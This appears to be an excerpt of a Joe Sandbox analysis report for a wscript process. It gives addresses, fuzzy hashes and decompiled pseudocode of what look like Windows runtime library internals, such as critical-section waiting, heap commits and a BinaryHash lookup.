0x0597fc4e
0x0597fc51
0x0597fc51
0x0597fc54
0x0597fc5a
0x0597fc5c
0x0597fc5f
0x0597fc61
0x0597fc63
0x0597fc65
0x0597fc67
0x0597fc6e
0x0597fc72
0x0597fc72
0x0597fc72
0x0597fc72
0x0597fc67
0x0597fc61
0x00000000
0x0597fc5a
0x0597fc49
0x0597fc41
0x0597fc30
0x0597fc27
0x0597fc03
0x0597fbcd
0x0597fbd3
0x0597fbd9
0x0597fbdc
0x0597fbde
0x0597fc99
0x0597fc9b
0x0597fc9d
0x0597fcd5
0x0597fcd5
0x0597fc89
0x0597fc89
0x00000000
0x0597fc9f
0x0597fc9f
0x0597fca3
0x00000000
0x0597fca3
0x00000000
0x0597fbe4
0x0597fbe4
0x0597fbe4
0x0597fbe4
0x0597fbe9
0x0597fbf2
0x00000000
0x0597fbf2
0x0597fbde
0x0597fbcb
0x0597fbab
0x0597fc8b
0x0597fc8b
0x0597fc8c
0x0597fb80
0x0597fb72
0x0597fb5e
0x0597fc8d
0x0597fc91
0x0597fadf
0x0597fadf
0x0597fae1
0x0597fae4
0x0597fae7
0x0597faec
0x0597faf8
0x0597fb00
0x0597fb07
0x0597fb0f
0x0597fb0f
0x0597fb07
0x00000000
0x0597faf8
0x0597fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 059BBE0F

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 19b32194d2d74cf3784be8e08d753fe90aeade0d5a9c4816cb5509354b97b7f6
Instruction ID: 228dc0020611b0ef0f68ece4d8ab5b4b032d8868c966c34ad468eabb95a51a93
Opcode Fuzzy Hash: 19b32194d2d74cf3784be8e08d753fe90aeade0d5a9c4816cb5509354b97b7f6
Instruction Fuzzy Hash: 5EA13971B146098BEB21DF64C454BBEB3BAFF84720F04457AE906EB690DB74E901CB80

Uniqueness

Uniqueness Score: -1.00%

Function 05942D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E05942D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x5a35350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x5a37bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E059897C0();
				}
				if( *0x5a379c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x5a379c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E05971624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E05967D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E059DFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E05989520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0597E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0599DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x5a36901;
								_push(_t109);
								_v52 = _t98;
								if( *0x5a36901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E05989980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E059895D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E05967D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E05967D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E059C7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E059DFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x5a35350;
							if(_t109 != 0x5a35350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E059DFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E059D5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x05942d8a
0x05942d8a
0x05942d92
0x05942d96
0x05942d9e
0x05942da0
0x05942da3
0x05942da5
0x05942da8
0x05942dab
0x05942db2
0x0599f9aa
0x0599f9ab
0x0599f9ae
0x0599f9ae
0x05942db8
0x05942dc2
0x0599f9b9
0x0599f9be
0x0599f9bf
0x0599f9bf
0x05942dcf
0x0599f9c9
0x05942dd5
0x05942dd5
0x05942dd5
0x05942dde
0x05942de1
0x05942e70
0x05942e72
0x05942e72
0x05942de7
0x05942deb
0x05942e7c
0x05942e83
0x05942e85
0x05942e8b
0x05942e8d
0x05942e92
0x05942e92
0x05942e85
0x05942df1
0x05942df7
0x05942df9
0x05942df9
0x05942dfc
0x05942dff
0x05942e02
0x00000000
0x05942e05
0x05942e0c
0x0599f9d9
0x05942e12
0x05942e12
0x05942e12
0x05942e1a
0x0599f9e3
0x0599f9e9
0x0599f9f0
0x0599f9f6
0x0599f9f8
0x0599f9f8
0x0599f9f0
0x05942e23
0x0599fa02
0x0599fa03
0x0599fa05
0x0599fa06
0x00000000
0x05942e29
0x05942e29
0x05942e2e
0x05942e34
0x05942e3e
0x00000000
0x00000000
0x05942e44
0x05942e47
0x05942e4d
0x00000000
0x00000000
0x05942e4f
0x05942e54
0x00000000
0x00000000
0x05942e5a
0x05942e5f
0x05942e9a
0x05942ea4
0x05942ea5
0x05942ea8
0x05942eaf
0x05942eb2
0x05942eb5
0x0599fae9
0x0599faeb
0x0599faed
0x0599faef
0x0599faf7
0x0599faf8
0x0599fafd
0x0599faff
0x0599fb04
0x0599fb04
0x0599faff
0x05942ec0
0x05942ec4
0x05942ec6
0x05942ec8
0x0599fb14
0x0599fb18
0x0599fb1e
0x0599fb21
0x0599fb21
0x05942ece
0x05942ece
0x05942ece
0x05942ed7
0x05942e61
0x05942e63
0x0599fa6b
0x0599fa71
0x0599fa76
0x0599fa78
0x0599fa8a
0x0599fa7a
0x0599fa83
0x0599fa83
0x0599fa8f
0x0599fa91
0x0599fa97
0x0599fa9d
0x0599faa4
0x0599faaa
0x0599faaf
0x0599fab1
0x0599fac3
0x0599fab3
0x0599fabc
0x0599fabc
0x0599fac8
0x0599facb
0x0599fadf
0x0599fadf
0x0599facb
0x0599faa4
0x0599fa91
0x05942e6f
0x05942e6f
0x05942e5f
0x0599fa13
0x0599fa15
0x0599fa17
0x0599fa1f
0x0599fa21
0x0599fa22
0x0599fa25
0x0599fa28
0x0599fa2f
0x0599fa2f
0x0599fa2a
0x0599fa2a
0x0599fa2a
0x0599fa31
0x0599fa34
0x0599fa36
0x0599fa3c
0x0599fa3e
0x0599fa41
0x0599fa43
0x0599fa45
0x0599fa45
0x0599fa41
0x0599fa3c
0x0599fa4a
0x0599fa4f
0x0599fa51
0x0599fa53
0x0599fa56
0x0599fa5b
0x0599fa5e
0x00000000
0x0599fa5e
0x05942e23

Strings

RTL: Re-Waiting, xrefs: 0599FA4A

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: fbfa2f5c37ef7fe5cbb03b5ae05b6b2120b96914a16733dbbcc4c3d4fdb022be
Instruction ID: 0d0dc4bdd30084bed1da96575d7d0c6155a9fb9272323b4dade6e3556dd285cb
Opcode Fuzzy Hash: fbfa2f5c37ef7fe5cbb03b5ae05b6b2120b96914a16733dbbcc4c3d4fdb022be
Instruction Fuzzy Hash: 92611331B056049FDF26DB6CC884F7EB7AAFB84324F1446A9E412972C0E734AD41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05A10EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05A10EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E05A0FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E05A11074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E05989730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E05A0A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E05A0A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x5a38b04 >> 0x14) + (_v44 -  *0x5a38b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E05967D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E05A0138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E05967D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E059FFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x5a38724 & 0x00000008) != 0) {
						E05A052F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E05A115B5(0x5a38ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x05a10eb7
0x05a10eb9
0x05a10ec0
0x05a10ec2
0x05a10ecd
0x05a1105b
0x05a1105b
0x05a11061
0x05a11066
0x05a11066
0x05a1106b
0x05a11073
0x05a11073
0x05a10ed3
0x05a10ed6
0x05a10edc
0x05a10ee0
0x05a10ee7
0x05a10ef0
0x05a10ef5
0x05a10efa
0x05a10efc
0x05a10efd
0x05a10f03
0x05a10f04
0x05a10f06
0x05a10f07
0x05a10f09
0x05a10f0e
0x05a10f14
0x05a10f23
0x05a10f2d
0x05a10f34
0x05a10f34
0x05a10f14
0x05a10f52
0x00000000
0x00000000
0x05a10f58
0x05a10f73
0x05a10f74
0x05a10f79
0x05a10f7d
0x05a10f80
0x05a10f86
0x05a10fab
0x05a10fb5
0x05a10fc6
0x05a10fd1
0x05a10fe3
0x05a10fd3
0x05a10fdc
0x05a10fdc
0x05a10feb
0x05a11009
0x05a11009
0x05a11015
0x05a11027
0x05a11017
0x05a11020
0x05a11020
0x05a1102f
0x05a1103c
0x05a1103c
0x05a11048
0x05a11050
0x05a11050
0x05a11055
0x00000000
0x05a11055
0x05a10f88
0x05a10f9e
0x05a10fa2
0x05a10fa9
0x00000000
0x00000000
0x00000000
0x05a10fa9
0x00000000

Strings

`, xrefs: 05A10F16

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 4af2ba55ccc11117cf628319f3849b477a2684dbf6ed03a22f1ba27a367a537a
Instruction ID: 98d4a112fa68c9ba7434fe07ccb508b92b644b97ac91727ea4e63a59868be389
Opcode Fuzzy Hash: 4af2ba55ccc11117cf628319f3849b477a2684dbf6ed03a22f1ba27a367a537a
Instruction Fuzzy Hash: 3A5189716087429BD325DF28D989F2BB7E9FBC4304F04092CFA9697290D670E946CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0597F0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0597F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E05964120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E05989830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E05989990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E059895D0();
							goto L11;
						} else {
							_t109 = L05964620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0598F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E059895D0();
										L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0597f0d3
0x0597f0d9
0x0597f0e0
0x0597f0e7
0x0597f0f2
0x0597f0f4
0x0597f0f8
0x0597f100
0x0597f108
0x0597f10d
0x0597f115
0x0597f116
0x0597f11f
0x0597f123
0x0597f124
0x0597f12c
0x0597f130
0x0597f134
0x0597f13d
0x0597f144
0x0597f14b
0x0597f152
0x059bbab0
0x059bbab0
0x0597f158
0x0597f158
0x0597f15a
0x0597f160
0x0597f165
0x0597f166
0x0597f16f
0x0597f173
0x059bbaa7
0x059bbaa7
0x059bbaab
0x00000000
0x0597f179
0x0597f18d
0x0597f191
0x059bbaa2
0x00000000
0x0597f197
0x0597f19b
0x0597f1a2
0x0597f1a9
0x0597f1af
0x0597f1b2
0x0597f1b6
0x0597f1b9
0x0597f1c4
0x0597f1d8
0x0597f1df
0x0597f1e3
0x0597f1eb
0x0597f1ee
0x0597f1f4
0x0597f20f
0x059bbab7
0x059bbabb
0x059bbacc
0x059bbad1
0x0597f215
0x0597f218
0x0597f226
0x0597f22b
0x00000000
0x0597f22b
0x0597f1f6
0x0597f1f6
0x0597f1f9
0x0597f1fb
0x0597f1fb
0x0597f1f4
0x0597f191
0x0597f173
0x0597f152
0x0597f203

Strings

@, xrefs: 0597F124

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: d7ca622b2b5f5a0e479397b1df262ea3c4dfb61f55ddcc8eb814eb0d14563219
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: BC518B71604714AFD321DF69C940A6BBBF9FF88710F00892EF99697690E7B4E904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 059C3540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E059C3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x5a3d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E05980BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E059C3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0598FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E059C3540;
						E0598FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0599DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E059D0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E059897C0();
					}
					return E0598B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E059C3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E059C3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0598FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E05989650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E059C3787(_a4,  &_v352, _t80);
						}
					}
					L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E059895D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x059c3552
0x059c355a
0x059c355d
0x059c3566
0x059c3567
0x059c357e
0x059c358f
0x059c35a1
0x059c35a5
0x059c366b
0x059c366b
0x059c366d
0x059c3672
0x059c3679
0x059c3685
0x059c368d
0x059c369d
0x059c36a7
0x059c36b8
0x059c36c6
0x059c36c7
0x059c36dc
0x059c36e1
0x059c36e7
0x059c36e9
0x059c36e9
0x059c3703
0x059c3703
0x059c35b5
0x059c35c0
0x059c35c4
0x00000000
0x00000000
0x059c35ca
0x059c35d7
0x059c35e2
0x059c35e6
0x059c35e8
0x059c35f5
0x059c35fa
0x059c3603
0x059c3604
0x059c3609
0x059c360a
0x059c3612
0x059c3613
0x059c361e
0x059c3622
0x059c3628
0x059c362f
0x059c362f
0x059c3636
0x059c3638
0x059c363b
0x059c3642
0x059c3642
0x059c3636
0x059c3657
0x059c3657
0x059c365c
0x059c3662
0x059c3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 059C358F

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: dc4a98b3227e5c01bbab228b4b77de80055f60472a5ef7ec172abf2b3b3f93a2
Instruction ID: f1723153ab90dd517aeaf582b8c1ff139214af39c04ad239f53723cf8bc1cd9c
Opcode Fuzzy Hash: dc4a98b3227e5c01bbab228b4b77de80055f60472a5ef7ec172abf2b3b3f93a2
Instruction Fuzzy Hash: A54128B1D0452C9BDF21DA50CD85FEEB77CAB44714F0085E9E609A7240DB30AE88CF95

Uniqueness

Uniqueness Score: -1.00%

Function 05A105AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E05A105AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E05A107DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E05989730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E05A0A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E05A0A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E05A11293(_t79, _v40, E05A107DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E05967D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E05A0138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x05a105c5
0x05a105ca
0x05a105d3
0x05a106db
0x05a106db
0x05a106dd
0x05a106e3
0x05a106e3
0x05a105dd
0x05a105e7
0x05a105f6
0x05a10600
0x05a10607
0x05a10610
0x05a10615
0x05a1061a
0x05a1061c
0x05a1061e
0x05a10624
0x05a10625
0x05a10627
0x05a10628
0x05a10631
0x05a10640
0x05a1064d
0x05a10654
0x05a10654
0x05a10631
0x05a1066d
0x05a10674
0x00000000
0x00000000
0x05a10692
0x05a1069e
0x05a106b0
0x05a106a0
0x05a106a9
0x05a106a9
0x05a106b8
0x05a106d6
0x05a106d6
0x00000000

Strings

`, xrefs: 05A10633

